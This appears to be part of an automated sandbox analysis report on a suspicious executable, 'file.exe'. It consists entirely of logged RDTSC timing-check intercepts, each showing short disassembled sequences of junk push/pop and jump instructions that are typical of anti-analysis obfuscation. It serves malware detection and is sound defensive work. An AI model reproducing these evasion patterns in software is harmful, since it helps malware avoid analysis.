                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C81599 second address: C815A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8188B second address: C818AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC41CC2F0D2h 0x0000000a jne 00007FC41CC2F0CEh 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C81BD4 second address: C81BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C81E8D second address: C81EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 jns 00007FC41CC2F0C6h 0x0000000f jns 00007FC41CC2F0C6h 0x00000015 pop edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C81EA3 second address: C81EA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C81EA8 second address: C81EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C82014 second address: C8201A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C82349 second address: C82374 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC41CC2F0D6h 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007FC41CC2F0C6h 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C82374 second address: C8237A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8237A second address: C82387 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 je 00007FC41CC2F0C6h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C824EE second address: C824F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0626C second address: C06270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C06270 second address: C0628E instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC41CDAB666h 0x00000008 jbe 00007FC41CDAB666h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jo 00007FC41CDAB66Eh 0x00000016 jns 00007FC41CDAB666h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0628E second address: C06296 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C06296 second address: C0629A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0629A second address: C062AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0CBh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C062AE second address: C062CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FC41CDAB66Eh 0x00000011 push ecx 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C062CB second address: C062D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FC41CC2F0C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8AE9A second address: C8AEC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jng 00007FC41CDAB66Eh 0x0000000b jmp 00007FC41CDAB66Dh 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C89F25 second address: C89F2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8992B second address: C8992F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8A628 second address: C8A64B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC41CC2F0C6h 0x0000000a jmp 00007FC41CC2F0D9h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8A64B second address: C8A653 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8A653 second address: C8A657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8A8B0 second address: C8A8C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnp 00007FC41CDAB666h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8A8C1 second address: C8A8C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8AB9F second address: C8ABD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC41CDAB671h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jnp 00007FC41CDAB666h 0x00000012 popad 0x00000013 pushad 0x00000014 jns 00007FC41CDAB666h 0x0000001a jno 00007FC41CDAB666h 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 jno 00007FC41CDAB666h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8ABD7 second address: C8ABDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8E7B6 second address: C8E7BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8E7BC second address: C8E7C4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8E7C4 second address: C8E7CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8E1D2 second address: C8E1D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8E1D9 second address: C8E1E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8E1E1 second address: C8E205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jo 00007FC41CC2F0E6h 0x0000000d jmp 00007FC41CC2F0D4h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8E337 second address: C8E351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007FC41CDAB673h 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9055A second address: C9055E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9055E second address: C9056F instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC41CDAB666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9056F second address: C9057D instructions: 0x00000000 rdtsc 0x00000002 je 00007FC41CC2F0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9BEEC second address: C9BEF6 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC41CDAB684h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9C18E second address: C9C196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9C196 second address: C9C19B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9C19B second address: C9C1A7 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC41CC2F0CEh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9C1A7 second address: C9C1C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 jmp 00007FC41CDAB675h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9C1C5 second address: C9C1CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9C448 second address: C9C488 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC41C7769E0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e jnl 00007FC41C7769D6h 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jnc 00007FC41C7769D6h 0x0000001e jo 00007FC41C7769D6h 0x00000024 jmp 00007FC41C7769E0h 0x00000029 popad 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9F079 second address: C9F081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9F224 second address: C9F22A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9F22A second address: C9F232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6654 second address: CA6659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6659 second address: CA6661 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA4840 second address: CA485C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41C7769E7h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA485C second address: CA4866 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC41D10CDDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA4866 second address: CA486E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA49D4 second address: CA49E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FC41D10CDD6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA49E0 second address: CA4A03 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC41C7769D6h 0x00000008 jmp 00007FC41C7769E0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jns 00007FC41C7769D6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA4CAA second address: CA4CC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC41D10CDD6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC41D10CDDAh 0x00000012 jg 00007FC41D10CDD6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA4CC7 second address: CA4CD9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FC41C7769D6h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA528A second address: CA52AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jno 00007FC41D10CDDCh 0x0000000b push ebx 0x0000000c jmp 00007FC41D10CDDDh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5826 second address: CA582C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA582C second address: CA5855 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC41D10CDD8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007FC41D10CDE8h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5855 second address: CA585B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA585B second address: CA5866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5866 second address: CA587E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC41C7769E2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA587E second address: CA588D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC41D10CDDBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA588D second address: CA5896 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA637C second address: CA6386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAAF2F second address: CAAF33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAAF33 second address: CAAF4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41D10CDDFh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA0C8 second address: CAA0F1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC41C7769D6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FC41C7769DDh 0x00000014 pop esi 0x00000015 pop eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 jnc 00007FC41C7769D6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA0F1 second address: CAA0F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA0F5 second address: CAA119 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC41C7769D6h 0x00000008 jp 00007FC41C7769D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jno 00007FC41C7769DCh 0x00000016 push eax 0x00000017 push edx 0x00000018 jnc 00007FC41C7769D6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CAA3BB second address: CAA3E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41D10CDDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a je 00007FC41D10CDD6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FC41D10CDDDh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CAA3E9 second address: CAA408 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41C7769E1h 0x00000007 jc 00007FC41C7769D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CAA408 second address: CAA40C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CAA91B second address: CAA956 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FC41C7769DEh 0x0000000e jmp 00007FC41C7769E7h 0x00000013 ja 00007FC41C7769D6h 0x00000019 popad 0x0000001a pop ecx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CAA956 second address: CAA95C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CAA95C second address: CAA966 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC41C7769D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CAA966 second address: CAA970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CAA970 second address: CAA980 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC41C7769D6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CAA980 second address: CAA984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CAAACC second address: CAAADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41C7769DFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CAAADF second address: CAAAF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41D10CDDCh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CAAAF5 second address: CAAAFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CAAAFB second address: CAAB10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jg 00007FC41D10CDF6h 0x0000000d ja 00007FC41D10CDDCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CAAB10 second address: CAAB18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CAAB18 second address: CAAB22 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC41D10CDD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CAAC71 second address: CAAC8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41C7769DCh 0x00000007 jp 00007FC41C7769D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007FC41C7769D8h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB8440 second address: CB8444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB6649 second address: CB664D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB664D second address: CB6655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB6655 second address: CB665C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB6C1D second address: CB6C21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB7128 second address: CB7130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB7470 second address: CB7474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB7474 second address: CB7480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC41C7769D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB7480 second address: CB7489 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB7B72 second address: CB7B76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
